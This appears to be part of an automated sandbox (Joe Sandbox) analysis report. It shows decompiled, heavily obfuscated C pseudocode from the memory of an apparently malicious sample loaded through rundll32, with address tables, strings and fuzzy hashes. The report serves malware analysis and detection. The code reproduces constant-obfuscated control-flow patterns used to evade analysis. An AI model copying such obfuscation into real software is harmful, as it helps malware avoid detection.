				_v60 = _v60 ^ 0x000746d3;
				_v12 = 0xe49076;
				_v12 = _v12 | 0xf94b921d;
				_t248 = 0x66;
				_v12 = _v12 / _t248;
				_v12 = _v12 | 0x30c6fb91;
				_v12 = _v12 ^ 0x32fd72cc;
				_v40 = 0x4af1f5;
				_v40 = _v40 + 0xffff1f3a;
				_v40 = _v40 + 0x5998;
				_v40 = _v40 | 0x0efc634a;
				_v40 = _v40 ^ 0x0ef1d3e1;
				_v36 = 0xca0e2e;
				_v36 = _v36 + 0xa6ab;
				_v36 = _v36 * 0x17;
				_v36 = _v36 | 0xed84f45f;
				_v36 = _v36 ^ 0xffb3e96f;
				_v32 = 0x9f068d;
				_v32 = _v32 | 0xccdcedf7;
				_v32 = _v32 >> 8;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdfe821c7;
				do {
					while(_t216 != 0x5ccdb59) {
						if(_t216 == 0x80e5149) {
							_push(_v32);
							_push(_t239);
							_push(3);
							_push(1);
							E003480E3(_v40, _v36);
							 *((short*)(_t239 + 6)) = 0;
							return 0;
						}
						if(_t216 == 0xb7209d2) {
							_t211 = E0035D25E(_t216);
							_t216 = 0x5ccdb59;
							continue;
						}
						if(_t216 != 0xeb2e9e3) {
							goto L8;
						}
						_t214 = E00350AE0(0x10, 4);
						_push(_v12);
						_t250 = _t214;
						_push(_t239);
						_push(_t250);
						_push(1);
						E003480E3(_v64, _v60);
						_t251 = _t251 + 0x18;
						_t242 = _t239 + _t250 * 2;
						_t216 = 0x80e5149;
						_t211 = 0x2e;
						 *_t242 = _t211;
						_t239 = _t242 + 2;
					}
					_t203 = E00350AE0(0x10, 4);
					_push(_v24);
					_t249 = _t203;
					_push(_t239);
					_push(1);
					_push(2);
					E003480E3(_v68, _v56);
					_push(_v72);
					_t240 = _t239 + 2;
					_push(_t240);
					_push(_t249);
					_push(1);
					E003480E3(_v28, _v76);
					_t251 = _t251 + 0x28;
					_t241 = _t240 + _t249 * 2;
					_t216 = 0xeb2e9e3;
					_t206 = 0x5c;
					 *_t241 = _t206;
					_t239 = _t241 + 2;
					L8:
				} while (_t216 != 0x3f21c37);
				return _t211;
			}

0x00358be9
0x00358bf9
0x00358bfa
0x00358c01
0x00358c04
0x00358c05
0x00358c06
0x00358c0c
0x00358c13
0x00358c16
0x00358c1d
0x00358c24
0x00358c2b
0x00358c32
0x00358c40
0x00358c47
0x00358c4a
0x00358c4d
0x00358c54
0x00358c5b
0x00358c69
0x00358c6c
0x00358c73
0x00358c7a
0x00358c81
0x00358c85
0x00358c8c
0x00358c93
0x00358c9a
0x00358c9e
0x00358ca5
0x00358cac
0x00358cb4
0x00358cb7
0x00358cba
0x00358cc1
0x00358ccf
0x00358cd2
0x00358cd9
0x00358ce0
0x00358ce7
0x00358cee
0x00358cf5
0x00358cff
0x00358d02
0x00358d05
0x00358d0c
0x00358d13
0x00358d17
0x00358d1e
0x00358d25
0x00358d2c
0x00358d33
0x00358d3a
0x00358d3e
0x00358d42
0x00358d49
0x00358d50
0x00358d57
0x00358d5b
0x00358d64
0x00358d6b
0x00358d78
0x00358d7b
0x00358d7e
0x00358d85
0x00358d93
0x00358d96
0x00358d9d
0x00358da4
0x00358dae
0x00358db1
0x00358db4
0x00358dbb
0x00358dc2
0x00358dc9
0x00358dd0
0x00358dd7
0x00358dde
0x00358de5
0x00358dec
0x00358df7
0x00358dfa
0x00358e01
0x00358e08
0x00358e0f
0x00358e16
0x00358e1a
0x00358e1e
0x00358e25
0x00358e25
0x00358e33
0x00358ef3
0x00358efc
0x00358efd
0x00358eff
0x00358f01
0x00358f0b
0x00000000
0x00358f0b
0x00358e3f
0x00358e8c
0x00358e91
0x00000000
0x00358e91
0x00358e47
0x00000000
0x00000000
0x00358e57
0x00358e5c
0x00358e62
0x00358e67
0x00358e68
0x00358e69
0x00358e6b
0x00358e70
0x00358e73
0x00358e76
0x00358e7d
0x00358e7e
0x00358e81
0x00358e81
0x00358ea2
0x00358ea7
0x00358ead
0x00358eb2
0x00358eb3
0x00358eb5
0x00358eb7
0x00358ebc
0x00358ec2
0x00358ec8
0x00358ec9
0x00358eca
0x00358ecc
0x00358ed1
0x00358ed4
0x00358ed7
0x00358ede
0x00358edf
0x00358ee2
0x00358ee5
0x00358ee5
0x00000000

Strings

ulG, xrefs: 00358BE9
wV, xrefs: 00358C0C

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ulG$wV
API String ID: 0-391097709
Opcode ID: 8ea01d99f5faf7535f4751c4092c9161afed52e32ffd80546732fa9e546ec510
Instruction ID: 5158e6e46bc02b9c180e29ea59820a37c42dbb630a9a43a570184e78483e3fed
Opcode Fuzzy Hash: 8ea01d99f5faf7535f4751c4092c9161afed52e32ffd80546732fa9e546ec510
Instruction Fuzzy Hash: C6914571D01219EBDB14DFE9D88A9DEBFB1FF44314F208109E616BA260D7B01A4ACF95

Uniqueness

Uniqueness Score: -1.00%

Function 00346D24 Relevance: 2.7, Strings: 2, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00346D24() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				short* _t158;
				void* _t161;
				void* _t164;
				intOrPtr _t173;
				intOrPtr _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t198;

				_v556 = 0x5b9523;
				_v556 = _v556 ^ 0xd644881d;
				_t164 = 0xafec1cc;
				_v556 = _v556 ^ 0xd61fc18a;
				_v560 = 0xf0211a;
				_v560 = _v560 >> 0xc;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x000d86e8;
				_v536 = 0x5b86ee;
				_t192 = 0x7a;
				_v536 = _v536 / _t192;
				_v536 = _v536 ^ 0x00051f37;
				_v528 = 0x15dba1;
				_v528 = _v528 + 0xffff3226;
				_v528 = _v528 ^ 0x001c60e6;
				_v564 = 0xcdfacc;
				_v564 = _v564 ^ 0x78a7d3e3;
				_v564 = _v564 << 0xe;
				_v564 = _v564 ^ 0x8a48a6fd;
				_v572 = 0x7eccf1;
				_v572 = _v572 + 0xffffd1bc;
				_t193 = 0x2e;
				_v572 = _v572 * 0x26;
				_v572 = _v572 ^ 0x12c53124;
				_v588 = 0x8dc921;
				_v588 = _v588 | 0x53df5653;
				_v588 = _v588 << 7;
				_v588 = _v588 * 0x73;
				_v588 = _v588 ^ 0xc8beb34e;
				_v544 = 0xe1fa74;
				_v544 = _v544 + 0xffffe6ac;
				_v544 = _v544 ^ 0x00e0f2b8;
				_v568 = 0x925246;
				_v568 = _v568 + 0xffffcd65;
				_v568 = _v568 + 0xffffdee0;
				_v568 = _v568 ^ 0x009eae97;
				_v576 = 0x3c09b4;
				_v576 = _v576 + 0xffff2c4c;
				_v576 = _v576 >> 0xa;
				_v576 = _v576 ^ 0x000cc2c3;
				_v592 = 0xac7846;
				_v592 = _v592 ^ 0xbb2572b9;
				_v592 = _v592 ^ 0xeb3265e6;
				_v592 = _v592 | 0x6a541c4b;
				_v592 = _v592 ^ 0x7af30806;
				_v548 = 0xb1a24a;
				_v548 = _v548 / _t193;
				_v548 = _v548 ^ 0x00094ccb;
				_v552 = 0xbe5b93;
				_v552 = _v552 | 0xe01e3375;
				_v552 = _v552 ^ 0xe0b0d42a;
				_v532 = 0x76dce5;
				_t194 = 0x19;
				_v532 = _v532 / _t194;
				_v532 = _v532 ^ 0x00002403;
				_v584 = 0xffb3b0;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x8b2427a7;
				_v584 = _v584 | 0x0ff5fda2;
				_v584 = _v584 ^ 0x7ffdbf2b;
				_v580 = 0x6f9ecd;
				_t195 = 0x5b;
				_v580 = _v580 / _t195;
				_v580 = _v580 << 0xc;
				_v580 = _v580 ^ 0x13a22276;
				_v540 = 0xd8d341;
				_v540 = _v540 * 0xb;
				_v540 = _v540 ^ 0x095c7847;
				do {
					while(_t164 != 0x2dc4ff7) {
						if(_t164 == 0x5cfc1e4) {
							return E00349DCF(_v532, _v584, _v580,  &_v524,  &_v524, E00344EE3, _v540, 0);
						}
						if(_t164 == 0x9efe9dd) {
							_push(_v536);
							_push(_v560);
							_t161 = E0035DCF7(_v556, 0x341000, __eflags);
							_t173 =  *0x363e10; // 0x0
							_t188 =  *0x363e10; // 0x0
							E003447CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
							_t158 = E0034A8B0(_v568, _t161, _v576);
							_t198 = _t198 + 0x24;
							_t164 = 0x2dc4ff7;
							continue;
						}
						if(_t164 != 0xafec1cc) {
							goto L8;
						}
						_t164 = 0x9efe9dd;
					}
					_t158 = E0034B6CF( &_v524, _v592, _v548, _v552);
					__eflags = 0;
					 *_t158 = 0;
					_t164 = 0x5cfc1e4;
					L8:
					__eflags = _t164 - 0xdc02af8;
				} while (__eflags != 0);
				return _t158;
			}

0x00346d2a
0x00346d34
0x00346d3c
0x00346d41
0x00346d49
0x00346d51
0x00346d56
0x00346d5b
0x00346d63
0x00346d75
0x00346d7a
0x00346d80
0x00346d88
0x00346d90
0x00346d98
0x00346da0
0x00346da8
0x00346db0
0x00346db5
0x00346dbd
0x00346dc5
0x00346dd2
0x00346dd5
0x00346dd9
0x00346de1
0x00346de9
0x00346df1
0x00346dfb
0x00346dff
0x00346e07
0x00346e0f
0x00346e17
0x00346e1f
0x00346e27
0x00346e2f
0x00346e37
0x00346e3f
0x00346e47
0x00346e4f
0x00346e54
0x00346e5c
0x00346e64
0x00346e6c
0x00346e74
0x00346e7c
0x00346e84
0x00346e94
0x00346e98
0x00346ea0
0x00346ea8
0x00346eb0
0x00346eb8
0x00346ec4
0x00346ec7
0x00346ecb
0x00346ed3
0x00346edb
0x00346ee0
0x00346ee8
0x00346ef0
0x00346efa
0x00346f08
0x00346f15
0x00346f1e
0x00346f23
0x00346f2b
0x00346f38
0x00346f3c
0x00346f44
0x00346f44
0x00346f4e
0x00000000
0x0034701e
0x00346f56
0x00346f68
0x00346f71
0x00346f79
0x00346f8a
0x00346fa2
0x00346fb2
0x00346fc1
0x00346fc6
0x00346fc9
0x00000000
0x00346fc9
0x00346f5e
0x00000000
0x00000000
0x00346f64
0x00346f64
0x00346fe0
0x00346fe7
0x00346fe9
0x00346fec
0x00346fee
0x00346fee
0x00346fee
0x00000000

Strings

e2, xrefs: 00346E6C
Gx\, xrefs: 00346F3C

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Gx\$e2
API String ID: 0-3912940318
Opcode ID: 8dbcad5292ba91f8e6562f170f48d8899e25d824446016eedbec27e1cf8b1f77
Instruction ID: 4177d2eabe1d23b35809039a0be475bb2d5ea064f5c59cd8ea031fd821b35058
Opcode Fuzzy Hash: 8dbcad5292ba91f8e6562f170f48d8899e25d824446016eedbec27e1cf8b1f77
Instruction Fuzzy Hash: 647131711083419FC369CF21D88A91FBBF1FBC5748F109A1DF1969A260D3B19949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0034A55F Relevance: 2.7, Strings: 2, Instructions: 159
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0034A55F() {
				char _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _t161;
				char* _t162;
				intOrPtr _t164;
				void* _t168;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				short* _t195;
				signed int* _t197;

				_t197 =  &_v584;
				_v528 = _v528 & 0x00000000;
				_v524 = _v524 & 0x00000000;
				_t168 = 0xe71c2f1;
				_v532 = 0xa0346f;
				_v560 = 0x45ed96;
				_t187 = 0x29;
				_v560 = _v560 / _t187;
				_t189 = 0x5d;
				_v560 = _v560 * 0x5e;
				_v560 = _v560 ^ 0x00ac5e2c;
				_v568 = 0x587b3f;
				_v568 = _v568 >> 1;
				_v568 = _v568 >> 6;
				_v568 = _v568 + 0x3200;
				_v568 = _v568 ^ 0x000d20ef;
				_v540 = 0x1767bf;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00010300;
				_v548 = 0xad8e3d;
				_v548 = _v548 ^ 0x5762e507;
				_v548 = _v548 ^ 0xbd28358e;
				_v548 = _v548 ^ 0xeae8e106;
				_v584 = 0xa1a61c;
				_v584 = _v584 * 0x38;
				_v584 = _v584 + 0xffff1963;
				_v584 = _v584 | 0xaacebf86;
				_v584 = _v584 ^ 0xabd4b38c;
				_v556 = 0xa4c35b;
				_v556 = _v556 / _t189;
				_v556 = _v556 | 0xf6aeb391;
				_v556 = _v556 ^ 0xf6ac7ee7;
				_v536 = 0xf31b8a;
				_v536 = _v536 | 0x87603e20;
				_v536 = _v536 ^ 0x87f7aca9;
				_v576 = 0x423791;
				_v576 = _v576 + 0xffffb580;
				_v576 = _v576 + 0x7a73;
				_v576 = _v576 ^ 0x7a6e2c80;
				_v576 = _v576 ^ 0x7a24ad4c;
				_v544 = 0x7ccdad;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x3e66d3ae;
				_v572 = 0x1eeccc;
				_v572 = _v572 | 0x2c9b1d75;
				_v572 = _v572 << 6;
				_t190 = 0x5b;
				_v572 = _v572 / _t190;
				_v572 = _v572 ^ 0x007e2283;
				_v552 = 0x119b6d;
				_t191 = 0x5a;
				_v552 = _v552 / _t191;
				_v552 = _v552 ^ 0xceecc8a8;
				_v552 = _v552 ^ 0xceebe4d8;
				_v580 = 0x5ef79f;
				_v580 = _v580 / _t187;
				_v580 = _v580 | 0x8cf80c97;
				_t192 = 0x3d;
				_v580 = _v580 / _t192;
				_v580 = _v580 ^ 0x02499ffb;
				do {
					while(_t168 != 0xc65bb2) {
						if(_t168 == 0x63f282e) {
							_t162 = E0035DA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
							_t197 =  &(_t197[4]);
							_t168 = 0xc65bb2;
							continue;
						}
						if(_t168 == 0xb3c9692) {
							_t164 =  *0x363e10; // 0x0
							__eflags = _t164 + 0x1c;
							return E00343BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
						}
						if(_t168 != 0xe71c2f1) {
							goto L15;
						}
						_t168 = 0x63f282e;
					}
					_v564 = 0x8b8c25;
					_v564 = _v564 * 0x78;
					_v564 = _v564 + 0xffff9cfb;
					_v564 = _v564 ^ 0x41694e51;
					_t161 = E0034CB52(_v584,  &_v520, _v556, _v536, _v576);
					_t197 =  &(_t197[3]);
					_t195 =  &_v520 + _t161 * 2;
					while(1) {
						_t162 =  &_v520;
						__eflags = _t195 - _t162;
						if(_t195 <= _t162) {
							break;
						}
						__eflags =  *_t195 - 0x5c;
						if( *_t195 != 0x5c) {
							L10:
							_t195 = _t195 - 2;
							__eflags = _t195;
							continue;
						}
						_t139 =  &_v564;
						 *_t139 = _v564 - 1;
						__eflags =  *_t139;
						if( *_t139 == 0) {
							__eflags = _t195;
							L14:
							_t168 = 0xb3c9692;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t168 - 0x6143c47;
				} while (__eflags != 0);
				return _t162;
			}

0x0034a55f
0x0034a565
0x0034a56c
0x0034a571
0x0034a576
0x0034a57e
0x0034a590
0x0034a595
0x0034a5a0
0x0034a5a3
0x0034a5a7
0x0034a5af
0x0034a5b7
0x0034a5bb
0x0034a5c0
0x0034a5c8
0x0034a5d0
0x0034a5d8
0x0034a5dd
0x0034a5e5
0x0034a5ed
0x0034a5f5
0x0034a5fd
0x0034a605
0x0034a612
0x0034a616
0x0034a61e
0x0034a626
0x0034a62e
0x0034a63e
0x0034a642
0x0034a64a
0x0034a652
0x0034a65a
0x0034a662
0x0034a66a
0x0034a672
0x0034a67a
0x0034a682
0x0034a68a
0x0034a692
0x0034a69a
0x0034a69f
0x0034a6a7
0x0034a6af
0x0034a6b7
0x0034a6c0
0x0034a6c5
0x0034a6c9
0x0034a6d1
0x0034a6df
0x0034a6e4
0x0034a6e8
0x0034a6f0
0x0034a6f8
0x0034a706
0x0034a70a
0x0034a71a
0x0034a726
0x0034a72f
0x0034a73c
0x0034a73c
0x0034a742
0x0034a772
0x0034a777
0x0034a77a
0x00000000
0x0034a77a
0x0034a746
0x0034a7f0
0x0034a7f5
0x00000000
0x0034a80f
0x0034a752
0x00000000
0x00000000
0x0034a758
0x0034a758
0x0034a77e
0x0034a78f
0x0034a793
0x0034a79b
0x0034a7b3
0x0034a7bc
0x0034a7bf
0x0034a7d3
0x0034a7d3
0x0034a7d7
0x0034a7d9
0x00000000
0x00000000
0x0034a7c4
0x0034a7c8
0x0034a7d0
0x0034a7d0
0x0034a7d0
0x00000000
0x0034a7d0
0x0034a7ca
0x0034a7ca
0x0034a7ca
0x0034a7ce
0x0034a7dd
0x0034a7e0
0x0034a7e0
0x00000000
0x0034a7e0
0x00000000
0x0034a7ce
0x00000000
0x0034a7e2
0x0034a7e2
0x0034a7e2
0x00000000

Strings

QNiA, xrefs: 0034A79B
sz, xrefs: 0034A67A

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: QNiA$sz
API String ID: 0-294658094
Opcode ID: 3187447a582f3c112f4edf69478346dd99c94bdfd04ed37a9373406c026d586a
Instruction ID: 43edbb2c4a12e4daaf7d0f38da02c9d9789ec55b3f343d550f7230602bc6f044
Opcode Fuzzy Hash: 3187447a582f3c112f4edf69478346dd99c94bdfd04ed37a9373406c026d586a
Instruction Fuzzy Hash: 81715131509341ABC3A8CF66D98581FBBF1FBC4718F40491DF586AA260D3759A098F87

Uniqueness

Uniqueness Score: -1.00%

Function 00350B19 Relevance: 2.6, Strings: 2, Instructions: 144
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00350B19(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				void* _t160;
				void* _t164;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				intOrPtr _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int* _t194;

				_t194 =  &_v68;
				_v12 = 0xec215;
				_v8 = 0x867af3;
				_t190 =  *0x363208; // 0x0
				_v4 = 0;
				_t164 = __ecx;
				_v64 = 0x2d9572;
				_t191 = _t190 + 0x20c;
				_v64 = _v64 + 0xffff7051;
				_v64 = _v64 ^ 0xb4c09ebb;
				_v64 = _v64 | 0x08f8e0e6;
				_v64 = _v64 ^ 0xbcfdfbfe;
				_v40 = 0xaf9231;
				_v40 = _v40 + 0x3789;
				_v40 = _v40 + 0x1acf;
				_v40 = _v40 ^ 0x00adbfc0;
				_v68 = 0xf5f340;
				_v68 = _v68 ^ 0x3b0075db;
				_v68 = _v68 >> 1;
				_v68 = _v68 + 0xaae2;
				_v68 = _v68 ^ 0x1dff90e5;
				_v24 = 0xe1803e;
				_v24 = _v24 + 0x946c;
				_v24 = _v24 ^ 0x00ebebe2;
				_v44 = 0xcb8087;
				_t166 = 0x7f;
				_v44 = _v44 / _t166;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00394faa;
				_v32 = 0x6e7c9c;
				_v32 = _v32 << 0xf;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00f599ec;
				_v36 = 0x8d7ece;
				_v36 = _v36 + 0xd96f;
				_v36 = _v36 + 0x3e8b;
				_v36 = _v36 ^ 0x008d6b01;
				_v60 = 0x740a18;
				_v60 = _v60 + 0x5af6;
				_t167 = 0x2d;
				_v60 = _v60 / _t167;
				_t168 = 0xc;
				_v60 = _v60 / _t168;
				_v60 = _v60 ^ 0x000f4a79;
				_v48 = 0xecd979;
				_v48 = _v48 + 0xffff2496;
				_t169 = 3;
				_v48 = _v48 / _t169;
				_v48 = _v48 ^ 0xbc9c03a4;
				_v48 = _v48 ^ 0xbcdb2390;
				_v52 = 0x17ff93;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0x3109;
				_v52 = _v52 ^ 0x7590f195;
				_v52 = _v52 ^ 0x8a641707;
				_v20 = 0x28811b;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x05ddec85;
				_v56 = 0x23ad29;
				_t170 = 0x5a;
				_v56 = _v56 / _t170;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x06fabbcf;
				_v56 = _v56 ^ 0x06fdb2ad;
				_v28 = 0x8d9789;
				_v28 = _v28 | 0x3813f7c3;
				_v28 = _v28 + 0xa24c;
				_v28 = _v28 ^ 0x38ab2d0e;
				_v16 = 0x83a12;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x41de3db0;
				while(1) {
					_t192 =  *_t191;
					if(_t192 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
						L4:
						 *_t191 =  *_t192;
						_t160 = E00358519(_v28, _v16, _t192);
					} else {
						_t133 =  &_v40; // 0xebebe2
						_t160 = E00348DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
						_t194 =  &(_t194[4]);
						if(_t160 != _v64) {
							_t191 = _t192;
						} else {
							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
							E00359E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
							E00351E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
							_t194 =  &(_t194[5]);
							goto L4;
						}
					}
				}
				return _t160;
			}

0x00350b19
0x00350b1c
0x00350b26
0x00350b32
0x00350b3a
0x00350b3e
0x00350b40
0x00350b48
0x00350b4e
0x00350b56
0x00350b5e
0x00350b66
0x00350b6e
0x00350b76
0x00350b7e
0x00350b86
0x00350b8e
0x00350b96
0x00350b9e
0x00350ba2
0x00350baa
0x00350bb2
0x00350bba
0x00350bc2
0x00350bca
0x00350bd8
0x00350bdd
0x00350be3
0x00350be8
0x00350bf0
0x00350bf8
0x00350bfd
0x00350c02
0x00350c0a
0x00350c12
0x00350c1a
0x00350c22
0x00350c2a
0x00350c32
0x00350c3e
0x00350c43
0x00350c4d
0x00350c52
0x00350c58
0x00350c60
0x00350c68
0x00350c74
0x00350c77
0x00350c7b
0x00350c83
0x00350c8b
0x00350c93
0x00350c98
0x00350ca0
0x00350ca8
0x00350cb0
0x00350cbd
0x00350cc1
0x00350cc9
0x00350cd9
0x00350cdc
0x00350ce0
0x00350ce5
0x00350ced
0x00350cf5
0x00350cfd
0x00350d05
0x00350d0d
0x00350d15
0x00350d1d
0x00350d22
0x00350d9d
0x00350d9d
0x00350da1
0x00000000
0x00000000
0x00350d2f
0x00350d8a
0x00350d95
0x00350d97
0x00350d31
0x00350d41
0x00350d45
0x00350d4a
0x00350d51
0x00350dab
0x00350d53
0x00350d58
0x00350d6a
0x00350d82
0x00350d87
0x00000000
0x00350d87
0x00350d51
0x00350d2f
0x00350daa

Strings

1, xrefs: 00350C98
, xrefs: 00350D41

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$
API String ID: 0-209397207
Opcode ID: 819bafaebae72a7e305ecbad1364cfd9548e2054cf40b96bd66ac1df1df97c88
Instruction ID: 7b3df77deb438600fb53f313ce2ad18ce8feb1da81c8bedb75b06cc71c5f26e8
Opcode Fuzzy Hash: 819bafaebae72a7e305ecbad1364cfd9548e2054cf40b96bd66ac1df1df97c88
Instruction Fuzzy Hash: 3E6130B25083419FC399CF21D48980BBBF1FBC9768F509A1DF19696260D7B2DA498F42

Uniqueness

Uniqueness Score: -1.00%

Function 0034AEFB Relevance: 2.6, Strings: 2, Instructions: 141
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E0034AEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t116;
				void* _t130;
				intOrPtr _t133;
				void* _t137;
				intOrPtr* _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				void* _t162;

				_t135 = _a12;
				_push(_a16);
				_t154 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t116);
				_v44 = 0xe8605f;
				_t162 = _t161 + 0x18;
				_v44 = _v44 + 0x84a0;
				_v44 = _v44 ^ 0x00e8e4ff;
				_t155 = 0;
				_v68 = 0xe00e28;
				_t137 = 0xc99b7e9;
				_v68 = _v68 << 9;
				_v68 = _v68 << 2;
				_t156 = 0x3b;
				_v68 = _v68 / _t156;
				_v68 = _v68 ^ 0x0001eb63;
				_v76 = 0x5a4023;
				_v76 = _v76 >> 0xf;
				_t157 = 0x5b;
				_v76 = _v76 * 0x13;
				_v76 = _v76 ^ 0x64c481b8;
				_v76 = _v76 ^ 0x64ccd277;
				_v64 = 0xe36df4;
				_v64 = _v64 / _t157;
				_t158 = 9;
				_v64 = _v64 * 0x52;
				_v64 = _v64 ^ 0x00c8b522;
				_v80 = 0x952e3b;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0xc023484e;
				_v80 = _v80 / _t158;
				_v80 = _v80 ^ 0x155df6ec;
				_v72 = 0x4bfcfc;
				_v72 = _v72 | 0x0a339af0;
				_v72 = _v72 << 0xf;
				_t159 = 0x12;
				_v72 = _v72 / _t159;
				_v72 = _v72 ^ 0x0e3e5ce5;
				_v40 = 0xc0630c;
				_v40 = _v40 | 0x5d0d844d;
				_v40 = _v40 ^ 0x5dc4e99c;
				_v52 = 0x98b7b;
				_v52 = _v52 + 0xa105;
				_v52 = _v52 >> 5;
				_v52 = _v52 ^ 0x0004c78d;
				_v56 = 0xd0814a;
				_v56 = _v56 >> 9;
				_v56 = _v56 * 0x3e;
				_v56 = _v56 ^ 0x001a31dc;
				_v60 = 0xb9e1cb;
				_v60 = _v60 * 0x25;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x768204a8;
				_v48 = 0xccd34a;
				_v48 = _v48 + 0xffff20ce;
				_v48 = _v48 ^ 0x00ce4dff;
				do {
					while(_t137 != 0x8f26e2d) {
						if(_t137 == 0xc99b7e9) {
							_t137 = 0x8f26e2d;
							continue;
						} else {
							if(_t137 != 0xfe1ef29) {
								goto L10;
							} else {
								_t133 =  *0x363dfc; // 0x0
								E0035E274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
								_t155 =  ==  ? 1 : _t155;
							}
						}
						L5:
						return _t155;
					}
					_push( *_t154);
					_t130 = E0035AE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
					_t162 = _t162 + 0x14;
					if(_t130 == 0) {
						_t137 = 0xeaa5f76;
						goto L10;
					} else {
						_t137 = 0xfe1ef29;
						continue;
					}
					goto L5;
					L10:
				} while (_t137 != 0xeaa5f76);
				goto L5;
			}

0x0034aeff
0x0034af06
0x0034af0a
0x0034af0c
0x0034af0d
0x0034af11
0x0034af15
0x0034af16
0x0034af17
0x0034af1c
0x0034af24
0x0034af27
0x0034af31
0x0034af39
0x0034af3b
0x0034af43
0x0034af48
0x0034af4d
0x0034af58
0x0034af5d
0x0034af63
0x0034af6b
0x0034af73
